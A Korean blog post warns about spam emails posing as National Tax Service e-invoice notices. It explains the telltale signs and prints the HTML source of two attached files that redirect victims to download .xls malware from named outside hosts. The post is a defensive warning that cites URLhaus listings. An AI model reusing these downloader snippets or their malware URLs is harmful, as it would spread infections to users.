국세청 과세 요청 스팸메일(Malware 주의)

이제 하다 하다 국세청 사칭 스팸메일이 등장하네요

진짜 같은 가짜(좌) / 진짜 세금계산서(우)

국세청에서 과세납부한다고 메일이 왔는데

뭔가 자세히보니 도메인이...?

심지어 uk니까 국가는 영국으로 보임...

 

본 메일은 국세청 홈택스를 이용하여 국일명판사 사업자가 주식회사 현대금형기술. - 발급일자 : 2019년 05월 30일 - 본 메일이 수신인과 관련없는 경우 수신거부/해제(여기) 를 클릭하시기 바랍니다. *메일 내용을 확인하기 위해서는 첨부파일을 클릭하십시오. 전자(세금)계산서 첨부파일이 열리지 않을 시 조치 방법 첨부파일을 사용자PC에 저장 저장한 첨부파일을 오른쪽마우스 클릭 후 연결프로그램에서 [Internet Explorer] 선택 국세청 세종특별자치시 국세청로 8-14 국세청(정부세종2청사 국세청동) (우편번호) 30128 Copyrightⓒ National Tax Service. All rights reserved.

이미지 제외하고 본문과 Copyright 내용

 

일단 국일명판사가 어딘지 모르니 수신거부/해제를 클릭하려고 했는데

링크가 없...

첨부한 이미지만 봐도 국세청 메일에는 파란색으로 링크 표시가 됨

 

첨부파일 이름부터가 Invoice_65736.html

실제 국세청에서 메일이 오면 NTS_eTaxInvoice.html으로 오니...

 

진짜 세금계산서에는 hometaxadmin@hometax.go.kr 로 메일이 옵니다

뭐 스마트빌 같은 데서도 메일이 오긴 하지만 벗어나는 이야기니 패스

 

그래도 첨부파일도 보내왔는데

받아서 소스를 확인해보니

 

<html>  <head>       <title>Downloading, please wait...</title> </head> <body> <script>      var url= "http://ianhennessee.com/eTaxInvoice_776347534.xls";      window.location = url;  </script> </body> </html>

주의) 실제 URL 그대로 넣은 거라 링크 타고 가시면 뭘웨어 감염 파일 다운로드하니

궁금해도 들어가지 마시길(링크는 제거했는데 복사해서 들어갈까봐)

 

ianhennessee 란 사이트로 강제 이동시키는 스크립트만 있음

뭐하는 사이트인가 방문해보려고 했더니 접근은 안되길래

(다운로드 말고 사이트 방문)

 

도메인만 검색하니

뭘웨어 URL로 등록된 사이트가 하나 보이네요

출처: https://urlhaus.abuse.ch/host/ianhennessee.com/

---

일전에 NTS_eTaxInvoice.html 로된 첨부파일이라고 썼는데

무색하게도 첨부파일명을 비슷하게 바로 바꿔서 메일이 다시 왔네요

그럼 뭐해 본문내용이 똑같은데...

첨부파일명이 홈텍스랑 비슷하게 NTS_eTaxInvoice_0051107.html 로 변경됨

수발신 주소

이번에는 huangzh@nim.ac.cn 으로 중국 도메인이네요

 

 

<html> <head> <meta http-equiv="refresh" content="1; URL=http://www.ma.mctv.ne.jp/~blanc/C758935.xls"> <title>다운로드 중 ...    </head> <body> 다운로드 중 ... </body> </html>

첨부파일 소스 인데 이번에는 ~.jp 로 변경되 있네요 

jp도메인이면 일본인데...

출처: https://urlhaus.abuse.ch/url/206182/

역시나 malware로 등록되있으니

무시하시면 됩니다